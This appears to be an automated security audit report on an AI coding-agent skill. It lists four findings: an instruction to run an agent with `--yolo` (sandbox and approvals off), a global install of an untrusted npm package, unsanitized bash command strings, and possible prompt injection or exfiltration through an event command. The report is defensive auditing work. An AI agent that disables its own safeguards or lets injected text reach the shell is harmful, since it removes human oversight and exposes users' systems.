Trust Assessment
coding-agent received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 2 high, 1 medium, and 0 low severity. Key findings include Direct instruction to install untrusted global package, Instruction to use agent with disabled sandbox and approvals (`--yolo`), Unsanitized command execution via `bash` tool's `command` parameter.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 18, 2026 (commit b62bd290). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Instruction to use agent with disabled sandbox and approvals (`--yolo`) The skill explicitly instructs the use of the `codex` agent with the `--yolo` flag, which is documented as 'NO sandbox, NO approvals (fastest, most dangerous)'. This grants the agent excessive permissions and removes critical security safeguards, making it highly vulnerable to command injection and arbitrary code execution if a malicious prompt is provided or generated. This flag should be avoided in any scenario involving untrusted input or sensitive environments. Strongly advise against using the `--yolo` flag in production or with untrusted inputs. If its use is deemed absolutely necessary, provide explicit, prominent warnings and ensure the `workdir` is strictly isolated and temporary. Consider removing this flag from examples or making its use conditional on explicit user confirmation and a robust risk assessment. | LLM | SKILL.md:106 | |
| HIGH | Direct instruction to install untrusted global package The skill explicitly instructs the installation of a global npm package `@mariozechner/pi-coding-agent`. Installing packages globally from potentially untrusted sources introduces a significant supply chain risk, as a compromised package could lead to arbitrary code execution on the host system. This instruction bypasses typical sandboxing or isolated environment practices. Avoid direct global package installation instructions within skills. If external tools are required, recommend secure, sandboxed, or isolated installation methods, or rely on pre-installed binaries. Provide clear warnings about the risks associated with installing untrusted software. | LLM | SKILL.md:159 | |
| HIGH | Unsanitized command execution via `bash` tool's `command` parameter The skill frequently instructs the LLM to use the `bash` tool with a `command` parameter that directly executes a shell string. If any part of this `command` string is constructed from untrusted user input (e.g., the agent's prompt or other dynamic content), without proper sanitization or escaping, it creates a direct command injection vulnerability. An attacker could craft a malicious prompt to execute arbitrary shell commands on the host system. When constructing `command` strings for the `bash` tool from user input or other untrusted sources, ensure all dynamic parts are properly escaped for shell execution. Implement robust input validation and sanitization. Consider using safer execution mechanisms that do not directly interpret shell metacharacters if available, or explicitly warning the LLM to sanitize inputs. | LLM | SKILL.md:24 | |
| MEDIUM | Potential prompt injection/data exfiltration via `openclaw system event` The skill instructs the LLM to construct an `openclaw system event` command, including a `text` argument that summarizes the agent's work. If this summary is derived from untrusted agent output, a malicious agent could inject commands into the `openclaw system event` tool or exfiltrate sensitive data by crafting the `text` argument to include shell metacharacters or sensitive information. This could lead to unintended system actions or information disclosure. When constructing `openclaw system event` commands, ensure that any dynamically generated `text` content is strictly sanitized to prevent command injection or unintended data disclosure. The LLM should be instructed to filter or escape any potentially malicious characters from agent output before including it in the `text` parameter. | LLM | SKILL.md:210 |
Scan History
Embed Code
[](https://skillshield.io/report/8616557727609e8f)
Powered by SkillShield